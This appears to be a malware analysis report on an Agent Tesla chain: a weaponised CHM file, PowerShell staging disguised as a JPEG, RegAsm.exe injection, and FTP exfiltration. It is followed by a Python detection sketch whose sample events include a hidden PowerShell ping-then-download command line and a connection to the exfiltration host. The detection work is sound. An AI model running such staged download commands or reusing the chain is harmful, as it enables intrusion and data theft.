Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
Essential information
- Published: 23/04/2026 03:27
- Modified: 27/04/2026 14:32
- Tags: 2026-04-23, agent-tesla, anti-analysis techniques, chm files, compiled html help, ftp exfiltration, information stealer, javascript obfuscation, powershell
- Related entities: 2 vulnerabilities (CVE), 6 observables, 16 techniques (MITRE), 1 malware, 2 others
Description
This analysis examines an attack chain that uses malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7-Zip archive containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript. The JavaScript launches PowerShell commands that first verify internet connectivity by pinging Google and then download additional PowerShell code disguised as a JPEG file. This second stage decompresses and loads several byte arrays in memory, including a loader DLL and a compressed Agent Tesla payload. The final Agent Tesla sample runs via process injection into RegAsm.exe and uses FTP to exfiltrate stolen data, including keystrokes, screenshots, and camera recordings, to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
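The chain above leaves a recognisable telemetry trail: the CHM viewer (hh.exe) spawning PowerShell, a PowerShell command line that combines a connectivity check with a download of a ".jpg" URL, and RegAsm.exe (a signed .NET Framework utility that has no legitimate reason to talk to the network) opening an outbound FTP connection. The following detection sketch is an added example and not part of the original report; it runs four such rules over constructed, simplified Sysmon-style process-creation and network-connection events. The rule names, event field names, the hypothetical `example.invalid` download host, and the local file paths are assumptions; the only value taken from the report is the defanged exfiltration host ftp.videoalliance[.]ru.

```python
"""Detection sketch for a CHM -> PowerShell -> RegAsm/FTP chain.

Added example, not code from the report. Event shapes are a constructed,
simplified stand-in for Sysmon EventID 1 (process creation) and
EventID 3 (network connection) telemetry.
"""
import ntpath
import re

# PowerShell that performs a connectivity check AND fetches an "image" URL
# (stage-2 code disguised as a JPEG, as described in the report).
PING_RE = re.compile(r"(?i)\b(ping|test-connection|test-netconnection)\b")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b.*\.jpe?g\b"
)
FTP_PORT = 21
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe")

# Constructed sample telemetry. Paths and example.invalid are placeholders;
# ftp.videoalliance[.]ru is the report's own (defanged) exfiltration host.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\hh.exe",
     "parent": r"C:\Program Files\7-Zip\7zFM.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\invoice.chm'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\hh.exe",
     "cmdline": "powershell -w hidden -c ping google.com; iwr http://example.invalid/img.jpg"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"id": 3, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dest_host": "ftp.videoalliance[.]ru", "dest_port": 21},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]


def _name(path):
    """Lower-cased basename of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return a list of (rule_name, subject) findings for the given events."""
    findings = []
    for ev in events:
        image = _name(ev.get("image"))
        parent = _name(ev.get("parent"))
        cmd = ev.get("cmdline", "")
        if ev["id"] == 1:
            # Rule 1: the CHM viewer should never launch a shell or script host.
            if parent == "hh.exe" and image in SCRIPT_HOSTS:
                findings.append(("chm_spawns_script_host", image))
            # Rule 2: connectivity check followed by an "image" download in one command.
            if image in ("powershell.exe", "pwsh.exe") and PING_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
                findings.append(("ps_connectivity_check_then_image_download", image))
            # Rule 3: RegAsm.exe started by PowerShell is a common injection-target pattern.
            if image == "regasm.exe" and parent in ("powershell.exe", "pwsh.exe"):
                findings.append(("regasm_spawned_by_powershell", image))
        elif ev["id"] == 3:
            # Rule 4: RegAsm.exe has no business on the network; FTP (tcp/21) matches the report.
            if image == "regasm.exe":
                rule = ("regasm_ftp_connection" if ev.get("dest_port") == FTP_PORT
                        else "regasm_network_connection")
                findings.append((rule, ev.get("dest_host")))
    return findings


if __name__ == "__main__":
    for rule, subject in detect(SAMPLE_EVENTS):
        print(f"{rule}: {subject}")
```

Rule 1 and Rule 4 are the high-confidence signals: hh.exe rarely has a legitimate reason to spawn a script host, and a network connection from RegAsm.exe is anomalous regardless of destination. Rules 2 and 3 are weaker on their own and are best used to raise the score of a host that already triggered one of the others.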